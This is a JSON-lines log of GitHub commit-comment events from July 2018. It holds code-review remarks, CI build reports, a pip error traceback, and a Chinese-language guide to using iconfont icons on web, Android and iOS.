{"id":"7942586322","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653414,"position":56,"line":56,"path":"index.html","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:30:45Z","updated_at":"2018-07-10T09:30:45Z","author_association":"NONE","body":"myVariable\r\n"}},"created_at":"2018-07-10T09:30:45Z"}
{"id":"7942593291","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653427,"position":76,"line":76,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:32:00Z","updated_at":"2018-07-10T09:32:00Z","author_association":"OWNER","body":"Forgot to localize or haven't gotten to it yet? :)\r\n"}},"created_at":"2018-07-10T09:32:00Z"}
{"id":"7942599531","type":"CommitCommentEvent","actor":{"login":"Soumil07"},"repo":{"name":"AnIdiotsGuide/discordjs-bot-guide"},"payload":{"comment":{"id":29653433,"position":6,"line":128,"path":"coding-guides/making-your-own-starboard.md","commit_id":"801ab636a3af70321e291e526caf2f76adca6a56","created_at":"2018-07-10T09:33:10Z","updated_at":"2018-07-10T09:33:10Z","author_association":"NONE","body":"Following code consistency with camelCase code, that should be fetchedMessages"}},"created_at":"2018-07-10T09:33:10Z"}
{"id":"7942601288","type":"CommitCommentEvent","actor":{"login":"Beamanator"},"repo":{"name":"Beamanator/RIPS-Auto-Import-CExt"},"payload":{"comment":{"id":29653435,"position":null,"line":null,"path":null,"commit_id":"8e1dbfb767064466017b8dabceefa109b148671d","created_at":"2018-07-10T09:33:28Z","updated_at":"2018-07-10T09:33:28Z","author_association":"OWNER","body":"Oops - actually supposed to be v2.4.2 since I skipped 2.4.0"}},"created_at":"2018-07-10T09:33:28Z"}
{"id":"7942602413","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/NLily22"},"payload":{"comment":{"id":29653439,"position":6,"line":6,"path":"week-08/day2/TodoMysql/src/main/java/com/greenfoxacademy/todo/connectionwithmysql/repositories/TodoRepInt.java","commit_id":"29a4c432709d34e34a69558e00b3cec53e04919f","created_at":"2018-07-10T09:33:40Z","updated_at":"2018-07-10T09:33:40Z","author_association":"NONE","body":"I think you got a bit confused. Kond created interfaces and interfaces implementations many times\r\n`public interface TodoService{}` and `public class TodoServiceImp implements TodoService{}`\r\nNow you only create an `interface` let the framework to implement it(based on database type)"}},"created_at":"2018-07-10T09:33:40Z"}
{"id":"7942602956","type":"CommitCommentEvent","actor":{"login":"Beamanator"},"repo":{"name":"Beamanator/RIPS-Auto-Import-CExt"},"payload":{"comment":{"id":29653441,"position":null,"line":null,"path":null,"commit_id":"f0e262d96c05054eb74c45a65e795824a68bab93","created_at":"2018-07-10T09:33:45Z","updated_at":"2018-07-10T09:33:45Z","author_association":"OWNER","body":"Accidentally published as 2.4.1"}},"created_at":"2018-07-10T09:33:45Z"}
{"id":"7942607416","type":"CommitCommentEvent","actor":{"login":"ravenlin101"},"repo":{"name":"ravenlin101/quant"},"payload":{"comment":{"id":29653448,"position":null,"line":null,"path":null,"commit_id":"d86bbc1ad81e34fe911e6d68f78a911c9ba79e0e","created_at":"2018-07-10T09:34:36Z","updated_at":"2018-07-10T09:34:36Z","author_association":"OWNER","body":"v1"}},"created_at":"2018-07-10T09:34:36Z"}
{"id":"7942610418","type":"CommitCommentEvent","actor":{"login":"vrlink"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29653455,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-10T09:35:11Z","updated_at":"2018-07-10T09:35:11Z","author_association":"NONE","body":"这个账号今天早上做过一次解抵押操作，还得等3天。不管解抵押的数量是多少，只要做了，之前解抵押的都要等待3天后才能解抵押。"}},"created_at":"2018-07-10T09:35:11Z"}
{"id":"7942612648","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653461,"position":134,"line":134,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:35:34Z","updated_at":"2018-07-10T09:35:34Z","author_association":"OWNER","body":"Should use IsBindOnEquip() instead of not IsSoulbound(). It could be Account Bound. IsBindOnEquip() is equivalent to BindType == 2 and not Soulbound. "}},"created_at":"2018-07-10T09:35:34Z"}
{"id":"7942618165","type":"CommitCommentEvent","actor":{"login":"steveoloco"},"repo":{"name":"steveoloco/HELLO-WORLD"},"payload":{"comment":{"id":29653472,"position":null,"line":null,"path":null,"commit_id":"74e243f4d5dffec8c118e00c90d8058ada68db3c","created_at":"2018-07-10T09:36:32Z","updated_at":"2018-07-10T09:36:32Z","author_association":"OWNER","body":"HELLO-WORLD TO BEGIN CODE"}},"created_at":"2018-07-10T09:36:32Z"}
{"id":"7942621534","type":"CommitCommentEvent","actor":{"login":"webknjaz"},"repo":{"name":"aio-libs/aiohttp"},"payload":{"comment":{"id":29653482,"position":4,"line":4,"path":".travis.yml","commit_id":"0d0ba0bfaf325f09df7a36ba133e52570f1f988e","created_at":"2018-07-10T09:37:10Z","updated_at":"2018-07-10T09:37:10Z","author_association":"MEMBER","body":"why?"}},"created_at":"2018-07-10T09:37:10Z"}
{"id":"7942623473","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653485,"position":2,"line":2,"path":"style.css","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:37:30Z","updated_at":"2018-07-10T09:37:30Z","author_association":"NONE","body":"* не использовать "}},"created_at":"2018-07-10T09:37:30Z"}
{"id":"7942623676","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653486,"position":72,"line":72,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:37:32Z","updated_at":"2018-07-10T09:37:32Z","author_association":"OWNER","body":"Should Keep / Sell be a type property on the rules instead of separate tables? We could always sort them and filter on that instead of doing separate tables. That way users could just flip a bit on the table to change it from a Sell rule to a Keep rule while working with rules without having to move them between lists."}},"created_at":"2018-07-10T09:37:32Z"}
{"id":"7942627296","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29653497,"position":14,"line":149,"path":"02-spatial-data.Rmd","commit_id":"e8b563e6c7e1f7b9c7509372a5e58192f592559c","created_at":"2018-07-10T09:38:11Z","updated_at":"2018-07-10T09:38:11Z","author_association":"OWNER","body":"Heads-up @Nowosad there was an inconsistency here: we said there were 17 *and* 68 geometry types. I've shortened the description and said there are 68 - sound right? It's consistent at least now. Note also the more specific time (summer 2018) when plotting works only for the 'core 7'."}},"created_at":"2018-07-10T09:38:11Z"}
{"id":"7942628030","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653499,"position":2,"line":2,"path":"style.css","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:38:18Z","updated_at":"2018-07-10T09:38:18Z","author_association":"NONE","body":"sanitize.css он позволяет привести к одному стилю во всех бразуерах"}},"created_at":"2018-07-10T09:38:18Z"}
{"id":"7942628616","type":"CommitCommentEvent","actor":{"login":"Fanyfa"},"repo":{"name":"Adalab/dorcas-s2-las-fruittis"},"payload":{"comment":{"id":29653504,"position":null,"line":null,"path":null,"commit_id":"784c9e59afc10dc83093e956180e5ada933b720e","created_at":"2018-07-10T09:38:25Z","updated_at":"2018-07-10T09:38:25Z","author_association":"COLLABORATOR","body":"Todo genial. ERes la mejor"}},"created_at":"2018-07-10T09:38:25Z"}
{"id":"7942631768","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29653510,"position":null,"line":null,"path":null,"commit_id":"cb61dc3763768bd7987a4ac8dbf13a1bd29b160a","created_at":"2018-07-10T09:38:59Z","updated_at":"2018-07-10T09:38:59Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2296 of 2312 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 612\n * Failed: 16\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.31%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-10T09:38:59Z"}
{"id":"7942632223","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"MSF-Jarvis/hosts"},"payload":{"comment":{"id":29653512,"position":null,"line":null,"path":null,"commit_id":"cde25f6062a4e7254f8f3f5b3f19c5ccf6df5962","created_at":"2018-07-10T09:39:05Z","updated_at":"2018-07-10T09:39:05Z","author_association":"NONE","body":"thug af"}},"created_at":"2018-07-10T09:39:05Z"}
{"id":"7942642628","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/nagyfranciska"},"payload":{"comment":{"id":29653541,"position":15,"line":15,"path":"week-08/day-04/db/src/main/java/com/database/db/models/Todo.java","commit_id":"802fc5344d8c47f3bceb0b17da5209889788b473","created_at":"2018-07-10T09:40:58Z","updated_at":"2018-07-10T09:40:58Z","author_association":"NONE","body":"👍 It is great that you follow the naming convention"}},"created_at":"2018-07-10T09:40:58Z"}
{"id":"7942643146","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653544,"position":39,"line":39,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:41:04Z","updated_at":"2018-07-10T09:41:04Z","author_association":"OWNER","body":"I'm not sure this will do what you think it will. not IsUnknownAppearance() will match almost everything except BOEs where you haven't collected the appearance, so this pretty much boils down to an itemlevel check, notwithstanding soulbound, which means it'll try to sell almost everything in your inventory.\r\n\r\nAlso prefer Level -> ItemLevel to be more explicit that this is for ItemLevel, not PlayerLevel."}},"created_at":"2018-07-10T09:41:04Z"}
{"id":"7942643179","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653545,"position":39,"line":39,"path":"style.css","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:41:04Z","updated_at":"2018-07-10T09:41:04Z","author_association":"NONE","body":"div с display: flex\r\nвнутри него ты засовываешь b41 b41"}},"created_at":"2018-07-10T09:41:04Z"}
{"id":"7942649031","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29653558,"position":null,"line":null,"path":null,"commit_id":"cb61dc3763768bd7987a4ac8dbf13a1bd29b160a","created_at":"2018-07-10T09:42:10Z","updated_at":"2018-07-10T09:42:10Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T09:42:10Z"}
{"id":"7942650882","type":"CommitCommentEvent","actor":{"login":"zszjy"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29653563,"position":null,"line":null,"path":null,"commit_id":"004561ba1f3b894dc164225e9e27b0a90679d15c","created_at":"2018-07-10T09:42:28Z","updated_at":"2018-07-10T09:42:28Z","author_association":"NONE","body":"87878"}},"created_at":"2018-07-10T09:42:28Z"}
{"id":"7942653821","type":"CommitCommentEvent","actor":{"login":"namrataukirde"},"repo":{"name":"crossroads/browse.goodcity"},"payload":{"comment":{"id":29653568,"position":null,"line":null,"path":null,"commit_id":"7203a28bffeb7f59e8c56782a3758533a9be492a","created_at":"2018-07-10T09:43:00Z","updated_at":"2018-07-10T09:43:00Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-10T09:43:00Z"}
{"id":"7942654517","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653569,"position":43,"line":43,"path":"style.css","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:43:09Z","updated_at":"2018-07-10T09:43:09Z","author_association":"NONE","body":"Попробуй в flex"}},"created_at":"2018-07-10T09:43:09Z"}
{"id":"7942656533","type":"CommitCommentEvent","actor":{"login":"carsonblack"},"repo":{"name":"carsonblack/therapyrealm-d8"},"payload":{"comment":{"id":29653573,"position":null,"line":null,"path":null,"commit_id":"3bad79782003e1633c534d44448d8e90d8127397","created_at":"2018-07-10T09:43:31Z","updated_at":"2018-07-10T09:43:31Z","author_association":"OWNER","body":"Created multidev environment [therapyrealm-d8#pr-10](https://dashboard.pantheon.io/sites/1e2f72fb-b1d6-4944-b76a-de18b38c3d0c#pr-10).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-10-therapyrealm-d8.pantheonsite.io/)"}},"created_at":"2018-07-10T09:43:31Z"}
{"id":"7942661287","type":"CommitCommentEvent","actor":{"login":"Kryklyvenko"},"repo":{"name":"gderiyenko/boat24"},"payload":{"comment":{"id":29653584,"position":null,"line":null,"path":null,"commit_id":"d3ff65a2bb8f8b85995011fd0ed73999ca296335","created_at":"2018-07-10T09:44:24Z","updated_at":"2018-07-10T09:44:24Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [4. Kontakteeru tдna button- before footer there is Kontakteeru tдna button it should work and send all the info to test@lwg.ee (or what is the best solution to get info by subscription?)](https://trello.com/c/q6L6NYmg/4-4-kontakteeru-t%D0%B4na-button-before-footer-there-is-kontakteeru-t%D0%B4na-button-it-should-work-and-send-all-the-info-to-testlwgee-or-wh)"}},"created_at":"2018-07-10T09:44:24Z"}
{"id":"7942662162","type":"CommitCommentEvent","actor":{"login":"ebraminio"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29653585,"position":null,"line":null,"path":null,"commit_id":"bf9e9676dda686f5b76826b4e3148f4a0b512e3c","created_at":"2018-07-10T09:44:33Z","updated_at":"2018-07-10T09:44:33Z","author_association":"MEMBER","body":"😊👏🙏"}},"created_at":"2018-07-10T09:44:33Z"}
{"id":"7942664271","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/nagyfranciska"},"payload":{"comment":{"id":29653587,"position":null,"line":null,"path":null,"commit_id":"802fc5344d8c47f3bceb0b17da5209889788b473","created_at":"2018-07-10T09:44:57Z","updated_at":"2018-07-10T09:44:57Z","author_association":"NONE","body":"It is a mega-giga-super-uber huge commit, with many deletions. I'm not sure that you deleted that files by your will :( I recommend to you to commit more often to prevent this super-size commits, because with small commit it is easier to follow code changes. Makes easier to roll-back your changes and also expected by the partners as well."}},"created_at":"2018-07-10T09:44:57Z"}
{"id":"7942666370","type":"CommitCommentEvent","actor":{"login":"AngleQian"},"repo":{"name":"SHSIDers/oclubs"},"payload":{"comment":{"id":29653595,"position":null,"line":null,"path":null,"commit_id":"8b31a5913355e82bc98e244a824e4a825ebf0f00","created_at":"2018-07-10T09:45:21Z","updated_at":"2018-07-10T09:45:21Z","author_association":"CONTRIBUTOR","body":"Changed DB table club to include permanent bypass option for reservation approvals from teacher and director"}},"created_at":"2018-07-10T09:45:21Z"}
{"id":"7942667009","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29653596,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-10T09:45:28Z","updated_at":"2018-07-10T09:45:28Z","author_association":"OWNER","body":"Ok, so we now pick the _relevant_ after fork patches. \"typo-tests\" should be renamed early and I suggest to also choose a new name for the executable `troff`. Users may want to install both packages."}},"created_at":"2018-07-10T09:45:28Z"}
{"id":"7942667953","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29653598,"position":null,"line":null,"path":null,"commit_id":"100c6a7e95b8e9624fc43fabc96d88070635d1ef","created_at":"2018-07-10T09:45:38Z","updated_at":"2018-07-10T09:45:38Z","author_association":"MEMBER","body":"Tag #618 "}},"created_at":"2018-07-10T09:45:38Z"}
{"id":"7942668081","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"departmentfortransport/ds-r-training"},"payload":{"comment":{"id":29653599,"position":null,"line":null,"path":null,"commit_id":"a2c7c4701fa4b197ffe45f0d51bacbd8093437f0","created_at":"2018-07-10T09:45:40Z","updated_at":"2018-07-10T09:45:40Z","author_association":"NONE","body":"[01-demo.Rmd:7:2:](https://github.com/departmentfortransport/ds-r-training/blob/a2c7c4701fa4b197ffe45f0d51bacbd8093437f0/01-demo.Rmd#L7) *style:* **Put spaces around all infix operators.**\n```r\n​x<-1\n~^~~\n```"}},"created_at":"2018-07-10T09:45:40Z"}
{"id":"7942668097","type":"CommitCommentEvent","actor":{"login":"AngleQian"},"repo":{"name":"SHSIDers/oclubs"},"payload":{"comment":{"id":29653600,"position":null,"line":null,"path":null,"commit_id":"8b31a5913355e82bc98e244a824e4a825ebf0f00","created_at":"2018-07-10T09:45:40Z","updated_at":"2018-07-10T09:45:40Z","author_association":"CONTRIBUTOR","body":"Staging server table updated accordingly"}},"created_at":"2018-07-10T09:45:40Z"}
{"id":"7942669119","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29653604,"position":null,"line":null,"path":null,"commit_id":"b3daff7cd0514b2b9ccadb1378415b9de843c075","created_at":"2018-07-10T09:45:51Z","updated_at":"2018-07-10T09:45:51Z","author_association":"MEMBER","body":"Tag #618"}},"created_at":"2018-07-10T09:45:51Z"}
{"id":"7942672365","type":"CommitCommentEvent","actor":{"login":"dmjones"},"repo":{"name":"awsdocs/aws-cloudhsm-user-guide"},"payload":{"comment":{"id":29653608,"position":32,"line":80,"path":"doc_source/client-history.md","commit_id":"d544f78ae6d26c850e9e396eeeb13edfd23e7ae1","created_at":"2018-07-10T09:46:26Z","updated_at":"2018-07-10T09:46:26Z","author_association":"NONE","body":"This change seems to be an error. This relates to #12, whereby there are no download links for 1.1.1.\r\n\r\nIf I download https://s3.amazonaws.com/cloudhsmv2-software/CloudHsmClient/Xenial/cloudhsm-client_latest_amd64.deb, I get a valid copy of 1.1.1."}},"created_at":"2018-07-10T09:46:26Z"}
{"id":"7942672371","type":"CommitCommentEvent","actor":{"login":"hdyanghj"},"repo":{"name":"hdyanghj/xiaomanong.github.io"},"payload":{"comment":{"id":29653609,"position":null,"line":null,"path":null,"commit_id":"07f9f8176bc2718bf3e773cce79036600bbb1a0a","created_at":"2018-07-10T09:46:26Z","updated_at":"2018-07-10T09:46:26Z","author_association":"OWNER","body":"web端使用\r\n用户在iconfont.cn可以下载，多种格式的icon，平台也可将图标转换为字体，便于前端工程师自由调整与调用。\r\n\r\nicon单个使用\r\n单个图标用户可以自行选择下载不同的格式使用，包括png,ai,svg。\r\n点击下载按钮，可以选择下载图标。\r\n\r\nhttp://img.alicdn.com/tps/TB1PoyDNpXXXXX8aXXXXXXXXXXX-1168-650.png\r\n\r\n此种方式适合用在图标引用特别少，以后也不需要特别维护的场景。\r\n\r\n比如设计师用来做demo原型。\r\n前端临时做个活动页。\r\n当然如果你只是为了下载图标做PPT,也是极好的。\r\n不过如果是成体系的应用使用，建议用户把icon加入项目，然后使用下面三种推荐的方式。\r\n\r\nunicode引用\r\nunicode是字体在网页端最原始的应用方式，特点是：\r\n\r\n兼容性最好，支持ie6+，及所有现代浏览器。\r\n支持按字体的方式去动态调整图标大小，颜色等等。\r\n但是因为是字体，所以不支持多色。只能使用平台里单色的图标，就算项目里有多色图标也会自动去色。\r\n注意：新版iconfont支持多色图标，这些多色图标在unicode模式下将不能使用，如果有需求建议使用symbol的引用方式\r\n\r\nunicode使用步骤如下：\r\n\r\n第一步：拷贝项目下面生成的font-face\r\n@font-face {font-family: 'iconfont';\r\n    src: url('iconfont.eot');\r\n    src: url('iconfont.eot?#iefix') format('embedded-opentype'),\r\n    url('iconfont.woff') format('woff'),\r\n    url('iconfont.ttf') format('truetype'),\r\n    url('iconfont.svg#iconfont') format('svg');\r\n}\r\n第二步：定义使用iconfont的样式\r\n.iconfont{\r\n    font-family:\"iconfont\" !important;\r\n    font-size:16px;font-style:normal;\r\n    -webkit-font-smoothing: antialiased;\r\n    -webkit-text-stroke-width: 0.2px;\r\n    -moz-osx-font-smoothing: grayscale;}\r\n第三步：挑选相应图标并获取字体编码，应用于页面\r\n<i class=\"iconfont\">&#x33;</i>\r\nfont-class引用\r\nfont-class是unicode使用方式的一种变种，主要是解决unicode书写不直观，语意不明确的问题。\r\n\r\n与unicode使用方式相比，具有如下特点：\r\n\r\n兼容性良好，支持ie8+，及所有现代浏览器。\r\n相比于unicode语意明确，书写更直观。可以很容易分辨这个icon是什么。\r\n因为使用class来定义图标，所以当要替换图标时，只需要修改class里面的unicode引用。\r\n不过因为本质上还是使用的字体，所以多色图标还是不支持的。\r\n使用步骤如下：\r\n\r\n第一步：拷贝项目下面生成的fontclass代码：\r\n//at.alicdn.com/t/font_8d5l8fzk5b87iudi.css\r\n第二步：挑选相应图标并获取类名，应用于页面：\r\n<i class=\"iconfont icon-xxx\"></i>\r\nsymbol引用\r\n这是一种全新的使用方式，应该说这才是未来的主流，也是平台目前推荐的用法。相关介绍可以参考这篇文章 这种用法其实是做了一个svg的集合，与上面两种相比具有如下特点：\r\n\r\n支持多色图标了，不再受单色限制。\r\n通过一些技巧，支持像字体那样，通过font-size,color来调整样式。\r\n兼容性较差，支持 ie9+,及现代浏览器。\r\n浏览器渲染svg的性能一般，还不如png。\r\n使用步骤如下：\r\n\r\n第一步：拷贝项目下面生成的symbol代码：\r\n//at.alicdn.com/t/font_8d5l8fzk5b87iudi.js\r\n第二步：加入通用css代码（引入一次就行）：\r\n<style type=\"text/css\">\r\n    .icon {\r\n       width: 1em; height: 1em;\r\n       vertical-align: -0.15em;\r\n       fill: currentColor;\r\n       overflow: hidden;\r\n    }\r\n</style>\r\n第三步：挑选相应图标并获取类名，应用于页面：\r\n<svg class=\"icon\" aria-hidden=\"true\">\r\n    <use xlink:href=\"#icon-xxx\"></use>\r\n</svg>\r\nAndroid使用\r\nandroid可以直接使用单个icon(svg,png)。也可以直接引入字体应用：\r\n\r\n第一步：从iconfont平台选择要使用到的图标，并下载至本地；复制字体文件到项目 assets 目录\r\nhttps://img.alicdn.com/tps/TB1z4QbNpXXXXX4XFXXXXXXXXXX-882-730.gif\r\n\r\n第二步：打开从iconfont平台下载下来的文件，并在目录中打开demo.html，找到图标相对应的 HTML 实体字符码；\r\nhttp://img3.tbcdn.cn/tfscom/T1p8FvFu8jXXaCwpjX.png\r\n\r\n第三步：打开 res/values/strings.xml，添加 string 值；\r\n<string name=\"icons\">&#x3605; &#x35ad; &#x35ae; &#x35af;</string>\r\n第四步：打开 activity_main.xml，添加 string 值到 TextView：\r\n<TextView\r\n\r\n    android:id=\"../../+id/like\"\r\n    android:layout_width=\"wrap_content\"\r\n    android:layout_height=\"wrap_content\"\r\n    android:text=\"../../string/icons\" />\r\n第五步：为 TextView 指定文字：\r\nimport android.graphics.Typeface;\r\nprotected void onCreate(Bundle savedInstanceState) {\r\n    super.onCreate(savedInstanceState);\r\n    setContentView(R.layout.activity_main);\r\n    Typeface iconfont = Typeface.createFromAsset(getAssets(), \"iconfont/iconfont.ttf\");\r\n    TextView textview = (TextView)findViewById(R.id.like);\r\n    textview.setTypeface(iconfont);\r\n}\r\nhttp://img2.tbcdn.cn/tfscom/T1OvFvFCRlXXaCwpjX.png\r\n\r\nIOS使用\r\nIOS可以直接使用单个icon(svg,png)。也可以直接引入字体应用：\r\n\r\n第一步：将您从IconFont平台下载的字体文件(.ttf)添加到工程中；\r\n打开Info.plist文件，增加一个新的Array类型的键，键名设置为UIAppFonts（Fonts provided by application），增加字体的文件名：“iconfont.ttf“\r\n\r\nhttp://img2.tbcdn.cn/tfscom/T1R3VxFuRnXXaCwpjX.png\r\n\r\n第二步：使用IconFont字体:\r\nUILabel * label = [[UILabel alloc] initWithFrame:self.view.bounds];\r\nUIFont *iconfont = [UIFont fontWithName:@\"uxIconFont\" size: 34];\r\nlabel.font = iconfont;\r\nlabel.text = @\"\\U00003439 \\U000035ad \\U000035ae \\U000035af \\U000035eb \\U000035ec\";\r\n[self.view addSubview: label];"}},"created_at":"2018-07-10T09:46:26Z"}
{"id":"7942672502","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653611,"position":189,"line":189,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:46:27Z","updated_at":"2018-07-10T09:46:27Z","author_association":"OWNER","body":"System could be a property of the rules that users can't modify.  Types: System, Custom"}},"created_at":"2018-07-10T09:46:27Z"}
{"id":"7942673951","type":"CommitCommentEvent","actor":{"login":"richard-scott"},"repo":{"name":"pypa/setuptools"},"payload":{"comment":{"id":29653613,"position":null,"line":null,"path":null,"commit_id":"949bd166692af0694631542b02e3a2f26a48b455","created_at":"2018-07-10T09:46:43Z","updated_at":"2018-07-10T09:46:43Z","author_association":"NONE","body":"I've made the change to `/usr/lib/python3/dist-packages/pkg_resources/extern/__init__.py`\r\nand I still get this:\r\n\r\n```\r\npip3 list --format=freeze --outdated\r\nException:\r\nTraceback (most recent call last):\r\n  File \"/usr/lib/python3/dist-packages/pip/basecommand.py\", line 215, in main\r\n    status = self.run(options, args)\r\n  File \"/usr/lib/python3/dist-packages/pip/commands/list.py\", line 157, in run\r\n    packages = self.get_outdated(packages, options)\r\n  File \"/usr/lib/python3/dist-packages/pip/commands/list.py\", line 168, in get_outdated\r\n    dist for dist in self.iter_packages_latest_infos(packages, options)\r\n  File \"/usr/lib/python3/dist-packages/pip/commands/list.py\", line 169, in <listcomp>\r\n    if dist.latest_version > dist.parsed_version\r\nTypeError: '>' not supported between instances of 'Version' and 'Version'\r\n```"}},"created_at":"2018-07-10T09:46:43Z"}
{"id":"7942676093","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"thatfella/Homeworks"},"payload":{"comment":{"id":29653619,"position":25,"line":25,"path":"hw1/src/main/java/Main.java","commit_id":"4ddd90130626b3a9f19e7b616dde031f86a20d19","created_at":"2018-07-10T09:47:07Z","updated_at":"2018-07-10T09:47:07Z","author_association":"NONE","body":"Предполагалось, что Вы как раз засунете зависимости в один бин, и метод мэйн должен выглядеть как получение одного бина и одного вызхова одного метода."}},"created_at":"2018-07-10T09:47:07Z"}
{"id":"7942679592","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"thatfella/Homeworks"},"payload":{"comment":{"id":29653630,"position":42,"line":42,"path":"hw1/src/main/java/ru/otus/hw1/service/ParserService.java","commit_id":"4ddd90130626b3a9f19e7b616dde031f86a20d19","created_at":"2018-07-10T09:47:46Z","updated_at":"2018-07-10T09:47:46Z","author_association":"NONE","body":"Вот лучше зависимости проставлять в конструкторе., а не через сеттеры - это релаьно проще."}},"created_at":"2018-07-10T09:47:46Z"}
{"id":"7942679616","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653631,"position":210,"line":210,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T09:47:46Z","updated_at":"2018-07-10T09:47:46Z","author_association":"OWNER","body":"Should this map be localized?"}},"created_at":"2018-07-10T09:47:46Z"}
